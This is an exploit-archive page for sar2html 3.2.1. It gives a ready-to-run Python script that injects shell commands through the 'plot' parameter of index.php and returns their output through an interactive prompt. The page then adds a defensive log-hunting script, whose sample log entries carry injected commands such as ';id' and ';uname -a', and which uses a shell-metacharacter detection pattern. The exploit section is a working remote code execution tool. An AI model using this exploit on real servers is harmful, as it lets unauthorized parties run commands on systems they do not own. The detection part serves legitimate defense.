sar2html 3.2.1 Remote Code Execution

sar2html version 3.2.1 remote code execution exploit. Original discovery for this vector of attack is attributed to Furkan Kayapinar in August of 2019.

MD5 | bc607c1eddfe53e9df710be0c5a8bb3d

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:
# Software Link:
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

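#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "

    def default(self, args):
        # Each line typed at the prompt is handed to exploiter() as the command.
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    # The command is appended after ';' in the 'plot' query parameter.
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        # Command output comes back inside the page's <option value=...> elements.
        out = re.findall("<option value=(.*?)>", output.text)
    except Exception:
        print("Error!!")
        out = []
    for ouut in out:
        # Skip the options that belong to the normal page.
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print(ouut)
    print()

if __name__ == "__main__":
    terminal = Terminal()
    terminal.cmdloop()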
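
For defenders, the request shape above (`index.php?plot=;<command>`) can be hunted in web server access logs. The following is an added example, not part of the original exploit or of sar2html: it assumes combined-format access logs, and the sample log lines, the `/sar2html/` path, the benign `plot` values and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters a shell treats as command separators or substitutions.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_plot_value(log_line):
    """Return the decoded 'plot' value if it holds shell metacharacters, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    # Assumption: the application is reached as index.php or as a directory index.
    if not parts.path.endswith(("/", "/index.php")):
        return None
    # Split on '&' only, so a literal ';' stays inside the value on every Python version.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name) != "plot":
            continue
        value = unquote_plus(raw)  # decodes %3B, %20, '+' before matching
        if SHELL_META.search(value):
            return value
    return None

def find_hits(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_plot_value(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Dec/2020:10:01:02 +0000] "GET /sar2html/index.php?plot=LINUX HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Dec/2020:10:01:09 +0000] "GET /sar2html/index.php?plot=;id HTTP/1.1" 200 5344',
    '203.0.113.7 - - [27/Dec/2020:10:01:15 +0000] "GET /sar2html/index.php?plot=%3Buname%20-a HTTP/1.1" 200 5390',
    '198.51.100.4 - - [27/Dec/2020:10:02:00 +0000] "GET /sar2html/index.php?host=web01&plot=HPUX HTTP/1.1" 200 5001',
]

if __name__ == "__main__":
    for number, value in find_hits(SAMPLE_LOG):
        print(f"line {number}: plot={value!r}")
```

The check decodes the query before matching, so percent-encoded separators are flagged the same way as literal ones.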
